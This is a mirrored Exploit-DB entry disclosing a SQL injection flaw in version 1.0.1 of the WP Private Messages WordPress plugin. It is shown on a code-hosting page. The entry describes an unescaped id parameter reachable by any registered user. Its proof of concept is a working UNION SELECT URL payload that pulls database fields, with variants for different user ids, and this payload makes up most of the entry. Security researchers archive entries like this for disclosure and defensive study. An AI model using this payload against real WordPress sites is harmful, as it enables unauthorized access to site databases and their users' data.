bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40940.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

42 lines
No EOL
1.3 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/
# Software Link: https://wordpress.org/plugins/wp-private-messages/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.1
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: registered user.
$_GET[id] is not escaped. Url is accessible for every registered user.
http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/
2 - Proof of Concept:
1 Login as regular user (created using wp-login.php?action=register):
2 -Using :
http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved
Obs: Use id number of your user in third column after word select. For example:
…UNION+SELECT+1,2,1,name,slug…
…UNION+SELECT+1,2,2,name,slug…
…UNION+SELECT+1,2,3,name,slug…
…UNION+SELECT+1,2,4,name,slug…
…UNION+SELECT+1,2,5,name,slug…
3 - Timeline:
12/12/2016 Discovered
13/12/2016 Vendor not finded
Reference in a new issue View git blame Copy permalink